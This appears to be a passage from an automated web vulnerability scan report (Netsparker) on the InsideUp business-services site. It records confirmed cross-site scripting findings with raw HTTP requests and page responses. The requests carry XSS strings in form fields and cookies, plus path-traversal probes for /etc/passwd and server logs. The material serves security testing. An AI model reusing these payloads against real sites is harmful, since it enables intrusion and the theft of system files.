OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 304
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004C8)%3c%2fscript%3e&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:40 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=1BDF420E3D5491B24D688935D0B0644A; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="'"--></style></script><script>netsparker(0x0004C..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST '"--></style></script><script>alert(0x0004C7)</script>
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 223
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004C7)%3c%2fscript%3e&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:40 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4F61E89C7F2C938D4743E3E1673F72B2; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
